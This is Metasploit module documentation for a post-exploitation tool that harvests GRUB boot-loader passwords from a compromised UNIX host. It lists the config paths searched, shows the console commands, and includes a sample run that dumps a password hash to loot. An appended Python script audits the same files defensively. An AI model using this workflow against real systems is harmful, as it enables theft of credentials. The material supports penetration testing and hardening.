GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/multi/gather/grub_creds.md

Gather GRUB Passwords

Reads all passwords from GRUB configuration files on UNIX-like machines.

Vulnerable Application

Any UNIX-like system with a shell or meterpreter session using GRUB.

Verification Steps

  1. Get a shell or meterpreter session on some host.

  2. Do: use post/multi/gather/grub_creds

  3. Do: set SESSION [SESSION_ID], replacing [SESSION_ID] with the number of the session you wish to run this module on.

  4. Do: run

  5. If the system has readable GRUB configuration files containing a password, they will be printed out.

Options

FILENAME

A string that can be used to specify an additional file to check after the usual places.

VERBOSE

A boolean that, when set, provides more detail on what is being checked. (Note: this option is defined elsewhere in Metasploit as a framework-wide option, but this module makes use of it.)

Scenarios

There are many places where a user might place the password that GRUB uses, so inserting a password line into any of these locations will work without any additional configuration:

```
/boot/grub/grub.conf
/boot/grub/grub.cfg
/boot/grub/menu.lst
/boot/grub2/grub.cfg
/boot/grub2/user.cfg
/etc/grub.conf
/etc/grub.d/*
/etc/grub/grub.cfg
/mnt/sysimage/boot/grub.conf
/mnt/boot/grub/grub.conf
/rpool/boot/grub/grub.cfg
```

Using a Metasploitable 2 VM (running Ubuntu 8.04), you can add the line password topscret to /boot/grub/menu.lst to easily see this module in action.

Meterpreter

Typical run against Ubuntu 18.04 LTS

```
msf5 exploit(handler) > use post/multi/gather/grub_creds
msf5 post(grub_creds) > set SESSION 1
SESSION => 1
msf post(grub_creds) > run
[*] Searching for GRUB config files..
[*] Reading /boot/grub/grub.cfg
[*] Reading /etc/grub.d/40_custom
[*] Reading /etc/grub.d/00_header
[*] Reading /etc/grub.d/20_linux_xen
[*] Reading /etc/grub.d/10_linux
[*] Reading /etc/grub.d/README
[*] Reading /etc/grub.d/01_users
[+] /etc/grub.d/01_users saved to /home/bcook/.msf4/loot/20191029041304_default_127.0.0.1_grub.config_755243.txt
[*] Reading /etc/grub.d/41_custom
[*] Reading /etc/grub.d/30_os-prober
[*] Reading /etc/grub.d/05_debian_theme
[*] Reading /etc/grub.d/30_uefi-firmware
[+] Found credentials
Grub Credential Table
=====================

Username             Password
--------             --------
putyourusernamehere  grub.pbkdf2.sha512.10000.CB9E1ED1050D0AFBC6EC3B75413FB288AD255B960C6DBA31C00A03AC286847DF8B1DEE167ED54316FD62EEAFE4A617959F90249849FBCB562AC27E68A6D59F90.E6AB5AE4B5E4EF375218A620A798002F5B38EE5F31B549A66AF5533A7931419BAC30E2305A95113F60BE116C9F3FE22126FE7768D095DE6B9BCDC55632400B52
```
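As an added defensive companion (example code written for this page, not part of the Metasploit module or its documentation), the following Python audit walks the same search list from the Scenarios section, parses the password forms the run above shows (GRUB2 `password_pbkdf2` and the legacy single-argument `password` line, plus the `--md5` and GRUB2 user/secret variants), and reports which entries any local account could read, without echoing the secrets. Function names and the report layout are this example's own choices.

```python
import glob
import os
import stat

# Search list from the Scenarios section (the module's usual places); '/etc/grub.d/*' is a glob.
GRUB_PATHS = ["/boot/grub/grub.conf", "/boot/grub/grub.cfg", "/boot/grub/menu.lst",
              "/boot/grub2/grub.cfg", "/boot/grub2/user.cfg", "/etc/grub.conf",
              "/etc/grub.d/*", "/etc/grub/grub.cfg", "/mnt/sysimage/boot/grub.conf",
              "/mnt/boot/grub/grub.conf", "/rpool/boot/grub/grub.cfg"]

def parse_grub_credentials(text):
    """Return (kind, user, secret) for each password line: GRUB2 'password_pbkdf2 user hash'
    (the form in the run above), GRUB2 'password user secret', legacy 'password [--md5] secret'."""
    found = []
    for raw in text.splitlines():
        tokens = raw.split("#", 1)[0].split()            # drop comments, then tokenize
        if not tokens:
            continue
        cmd, args = tokens[0], tokens[1:]
        if cmd == "password_pbkdf2" and len(args) == 2:
            found.append(("pbkdf2", args[0], args[1]))
        elif cmd == "password" and len(args) == 2 and args[0].startswith("--"):
            found.append(("legacy-" + args[0].lstrip("-"), None, args[1]))  # --md5 / --encrypted
        elif cmd == "password" and len(args) == 1:       # legacy GRUB, e.g. 'password topscret'
            found.append(("plaintext", None, args[0]))
        elif cmd == "password" and len(args) == 2:       # GRUB2 plaintext user/secret pair
            found.append(("plaintext", args[0], args[1]))
    return found

def is_world_readable(mode):
    """True when the 'other' read bit is set, i.e. any local account can read the file."""
    return bool(mode & stat.S_IROTH)

def audit_grub_files(patterns=GRUB_PATHS):
    """Walk the search list and report every credential entry, without echoing the secret."""
    report = []
    for path in [p for pat in patterns for p in sorted(glob.glob(pat))]:
        try:
            mode = os.stat(path).st_mode
            with open(path, encoding="utf-8", errors="replace") as fh:
                creds = parse_grub_credentials(fh.read())
        except OSError:
            continue                                     # absent, a directory, or unreadable by us
        for kind, user, _secret in creds:
            report.append({"path": path, "kind": kind, "user": user,
                           "world_readable": is_world_readable(mode)})
    return report
```

Run `audit_grub_files()` as root on a host to list every config entry the module would harvest; any entry flagged `world_readable` or of kind `plaintext` is the one to fix first (tighten the file mode, or move to `password_pbkdf2`).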